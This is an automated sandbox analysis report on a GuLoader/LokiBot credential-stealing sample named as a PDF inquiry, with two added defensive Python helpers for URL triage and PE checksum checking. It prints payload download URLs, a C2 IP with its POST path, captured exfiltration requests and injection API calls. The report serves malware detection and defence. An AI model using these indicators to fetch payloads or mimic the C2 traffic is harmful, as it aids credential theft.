
Analysis Report INQUIRY-11062020_PDF .scr

Overview

General Information

Sample Name: INQUIRY-11062020_PDF .scr (renamed file extension from scr to exe)
Analysis ID: 311006
MD5: 5207df389f5abacaff17bc4bd84810ec
SHA1: 99162953a06cfbfb5734b8b90766b027bf8d5500
SHA256: 3728d18f32ddaf2f72a64f65da6d401f054ac5f6bae9f548a4cb85848317cf3a
Tags: Lokiscr

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • INQUIRY-11062020_PDF .exe (PID: 4812 cmdline: 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe' MD5: 5207DF389F5ABACAFF17BC4BD84810EC)
    • INQUIRY-11062020_PDF .exe (PID: 6512 cmdline: 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe' MD5: 5207DF389F5ABACAFF17BC4BD84810EC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: INQUIRY-11062020_PDF .exe PID: 6512 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: INQUIRY-11062020_PDF .exe PID: 6512 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: INQUIRY-11062020_PDF .exe PID: 4812 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: INQUIRY-11062020_PDF .exe PID: 4812 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.bin, Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: INQUIRY-11062020_PDF .exe, Virustotal: Detection: 29%
Source: INQUIRY-11062020_PDF .exe, ReversingLabs: Detection: 33%
Machine Learning detection for sample
Source: INQUIRY-11062020_PDF .exe, Joe Sandbox ML: detected

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49730 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49730 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49731 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49731 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49732 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49732 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49732 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49732 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 195.69.140.147:80
Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49733 -> 195.69.140.147:80
Source: Joe Sandbox View, IP Address: 38.108.185.79 38.108.185.79
Source: Joe Sandbox View, IP Address: 195.69.140.147 195.69.140.147
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected: GET /mpa/test_jCFQlqMshp74.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: www.termorolne.rs | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: www.termorolne.rs | Cache-Control: no-cache | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: od.lk | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 44FCD1D4 | Content-Length: 190 | Connection: close
Source: global traffic, HTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 44FCD1D4 | Content-Length: 163 | Connection: close
Source: unknown, TCP traffic detected without corresponding DNS query: 195.69.140.147
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe, Code function: 8_2_00569062 InternetReadFile,8_2_00569062
Source: unknown, DNS traffic detected: queries for: www.termorolne.rs
Source: unknown, HTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 44FCD1D4 | Content-Length: 190 | Connection: close
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 07 Nov 2020 10:57:27 GMT | Server: Apache | Connection: close | Content-Type: text/html; charset=UTF-8
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp, String found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tV
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp, String found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tVi4_
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://certificates.starfieldtech.com/repository/0
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp, String found in binary or memory: http://crl.starfieldt
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp, String found in binary or memory: http://crl.starfieldtech.com/sfig2s1-139.crl0c
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://crl.starfieldtech.com/sfig2s1-191.crl0c
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.starfieldtech.
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.starfieldtech.com/08
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.starfieldtech.com/0;
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.starfieldtech.com/0F
Source: INQUIRY-11062020_PDF .exe, String found in binary or memory: http://od.lk/s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmp, String found in binary or memory: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.bin
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmp, String found in binary or memory: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.binhttp://od.lk/s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp, String found in binary or memory: https://certs.starfieldtech.com/repository/0
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp, String found in binary or memory: https://web.opendrive.com/
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp, String found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/NzhfMjExNTQ1MjJf?inline=1
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp, String found in binary or memory: https://web.opendrive.com/t
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tV
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tVi4_
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/0
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certs.starfieldtech.com/repository/1402
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldt
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-139.crl0c
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-191.crl0c
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
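The URL list above mixes two very different kinds of string. The crl.*, ocsp.*, certs.* and certificates.starfieldtech.com entries are CRL, OCSP and AIA pointers from a Starfield certificate chain that the process had in memory while validating TLS (crypt32 is loaded, see the System Summary), and the odd tails such as ".crl0L" or "/08" are the bytes that follow the URL inside the certificate's DER encoding, not part of the address. The od.lk, termorolne.rs, web.opendrive.com and 195.69.140.147 entries are the ones worth acting on: the two test_jCFQlqMshp74.bin locations are where a GuLoader-class downloader fetches its encrypted second stage, and the /.op/cr.php/ path on the bare IP looks like a reporting or C2 endpoint. The script below is an added triage helper, not part of the Joe Sandbox report: it pulls the URLs out of lines in the report's format, trims the DER tail, drops fragments that are just truncated prefixes of a longer hit, and separates PKI noise from candidate indicators. The input is a constructed excerpt of lines copied from this page; the host-based PKI rule is an assumption that covers this report and should be extended for other CAs.

```python
import re
from urllib.parse import urlparse

# Constructed input: a handful of "String found in binary or memory" lines
# copied from the report above (one of them carries two URLs run together).
SAMPLE_REPORT = """\
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp | String found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.starfieldtech.
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.starfieldtech.com/08
Source: INQUIRY-11062020_PDF .exe | String found in binary or memory: http://od.lk/s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmp | String found in binary or memory: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.binhttp://od.lk/s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp | String found in binary or memory: https://certs.starfieldtech.com/repository/0
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp | String found in binary or memory: https://web.opendrive.com/
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp | String found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/NzhfMjExNTQ1MjJf?inline=1
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp | String found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tV
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmp | String found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tVi4_
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmp | String found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
"""

STRING_HIT = re.compile(r"String found in binary or memory:\s*(\S+)")
# Two URLs can be glued together when the scanner reads past a NUL; split at
# every "http://" / "https://" boundary.
URL_SPLIT = re.compile(r"(?=https?://)")
# A URL embedded in a certificate is followed by DER bytes that the string
# scanner appends ("0L", "0;", "08", ...). Trim a trailing "0" plus one byte
# after a .crl/.crt name or a trailing slash. (A legitimate URL ending in
# "/0x" would be clipped too; acceptable for triage, not for blocking.)
DER_TAIL = re.compile(r"(/|\.crl|\.crt)0[^/]?$")
# Assumption for this report: hosts named like CA infrastructure are noise.
PKI_HOST = re.compile(r"^(crl|ocsp|certs|certificates)\.", re.I)


def extract_urls(report_text):
    """Return the cleaned, de-duplicated URLs found in report lines."""
    urls = set()
    for line in report_text.splitlines():
        hit = STRING_HIT.search(line)
        if not hit:
            continue
        for fragment in URL_SPLIT.split(hit.group(1)):
            if fragment.startswith("http"):
                urls.add(DER_TAIL.sub(r"\1", fragment))
    # A hit that is a strict prefix of another hit is a truncated copy.
    return sorted(u for u in urls
                  if not any(v != u and v.startswith(u) for v in urls))


def triage(report_text):
    """Split URLs into candidate indicators and certificate-chain noise."""
    buckets = {"candidate": [], "pki_noise": []}
    for url in extract_urls(report_text):
        host = urlparse(url).hostname or ""
        key = "pki_noise" if PKI_HOST.match(host) else "candidate"
        buckets[key].append(url)
    return buckets


def candidate_hosts(report_text):
    """Hosts to block or hunt for, one per candidate URL."""
    return sorted({urlparse(u).hostname for u in triage(report_text)["candidate"]})


if __name__ == "__main__":
    for bucket, urls in triage(SAMPLE_REPORT).items():
        print(bucket)
        for u in urls:
            print("  ", u)
```

Run against the constructed excerpt it leaves four candidate URLs on four hosts (195.69.140.147, od.lk, web.opendrive.com, www.termorolne.rs) and four trimmed PKI URLs; the truncated "http://ocsp.starfieldtech." and "...XGfxkVvZa76tV" fragments disappear because a longer hit covers them.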

          System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: INQUIRY-11062020_PDF .exe
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E9062 NtMapViewOfSection
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E8484 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E8BA9 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E3801 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E942E NtMapViewOfSection
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E3648 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E906C NtMapViewOfSection
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E3E7A NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E96F1 NtMapViewOfSection
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E4315 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E954F NtMapViewOfSection
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E7357 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E6F55 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E9166 NtMapViewOfSection
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E4173 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E8B81 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E71FE NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E1FF9 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E39F9 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_005630D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00562DED Sleep,TerminateThread,Sleep,LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00562FA5 CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00568BA9 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00563155 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00564173 LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00564127 LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_005641C4 LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00568FC5 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00568B81 NtProtectVirtualMemory
Source: INQUIRY-11062020_PDF .exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290031434.0000000000410000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290572831.00000000020B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs INQUIRY-11062020_PDF .exe
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327455582.000000001DEB0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs INQUIRY-11062020_PDF .exe
Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327480188.000000001E020000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs INQUIRY-11062020_PDF .exe
Source: INQUIRY-11062020_PDF .exe, 00000008.00000000.289029801.0000000000410000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
Source: INQUIRY-11062020_PDF .exe | Binary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@3/4
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: INQUIRY-11062020_PDF .exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: INQUIRY-11062020_PDF .exe | Virustotal: Detection: 29%
Source: INQUIRY-11062020_PDF .exe | ReversingLabs: Detection: 33%
Source: unknown | Process created: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe'
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Process created: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe'
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

          Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: Process Memory Space: INQUIRY-11062020_PDF .exe PID: 6512, type: MEMORY
Source: Yara match | File source: Process Memory Space: INQUIRY-11062020_PDF .exe PID: 4812, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: INQUIRY-11062020_PDF .exe PID: 6512, type: MEMORY
Source: Yara match | File source: Process Memory Space: INQUIRY-11062020_PDF .exe PID: 4812, type: MEMORY
Source: INQUIRY-11062020_PDF .exe | Static PE information: real checksum: 0x1a5cb should be: 0x1da60
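The checksum line says the OptionalHeader.CheckSum stored in the file (0x1a5cb) does not match the value computed over the file's bytes (0x1da60). The check itself is cheap to reproduce: the PE checksum is the imagehlp CheckSumMappedFile sum, a 16-bit folded sum of the whole file with the CheckSum field skipped, plus the file length. The script below is an added example and not part of the report or of Joe Sandbox; since the sample's bytes are not on this page it runs over a constructed 512-byte stand-in (MZ signature, e_lfanew, PE signature and a stored checksum, everything else zero), and it assumes e_lfanew is 4-byte aligned, which is true of any normally linked PE. Keep the caveat in mind when scoring this: Windows verifies the checksum only for drivers and a few system images, so for an ordinary user-mode executable a mismatch only tells you the file was packed, patched or built without the field being set.

```python
import struct


def _checksum_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum: e_lfanew + 4 (PE\\0\\0)
    + 20 (COFF header) + 64 (same offset for PE32 and PE32+)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 0x58


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, _checksum_offset(data))[0]


def pe_checksum(data: bytes) -> int:
    """Compute the value CheckSumMappedFile would produce for this image."""
    skip = _checksum_offset(data)          # assumption: 4-byte aligned
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue                       # the field itself is excluded
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)   # end-around carry
    total = (total & 0xFFFF) + (total >> 16)           # fold to 16 bits
    total = total + (total >> 16)
    total &= 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF            # plus the file size


def checksum_report(data: bytes) -> dict:
    """The same verdict the sandbox prints: stored vs computed."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    return {"stored": stored, "computed": computed, "valid": stored == computed}


def build_sample(stored: int) -> bytes:
    """Constructed stand-in for the real file: 512 zero bytes carrying the
    DOS signature, e_lfanew = 0x80, a PE signature and the given CheckSum."""
    buf = bytearray(512)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<I", buf, 0x80 + 0x58, stored)
    return bytes(buf)


if __name__ == "__main__":
    # Stored value borrowed from the report line; computed will differ.
    r = checksum_report(build_sample(0x1A5CB))
    print("stored 0x%x computed 0x%x valid=%s" % (r["stored"], r["computed"], r["valid"]))
    # Writing the computed value back makes the image consistent again.
    print(checksum_report(build_sample(r["computed"]))["valid"])
```

For the stand-in the only non-zero dwords are 0x5A4D ("MZ"), 0x80 (e_lfanew) and 0x4550 ("PE"), so the folded sum is 0xA01D and the checksum 0xA01D + 512 = 0xA21D; any stored value other than that is flagged, exactly as the report flags 0x1a5cb against 0x1da60 for the real file. On a real sample pass the whole file's bytes to checksum_report.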
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_00407B5A push ecx; ret 0_2_00407B6B
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_0040393D pushad ; retf 0_2_004039A3
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_004053F7 push eax; iretd 0_2_00405410
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 0_2_020E79D1 push ebp; retf 0_2_020E79D2
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_00565D64 push FFFFFFB9h; retf 8_2_00565D66
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Code function: 8_2_005679D1 push ebp; retf 8_2_005679D2
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Process information set: NOOPENFILEERRORBOX (repeated)
Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe | Process information set: NOGPFAULTERRORBOX (repeated)
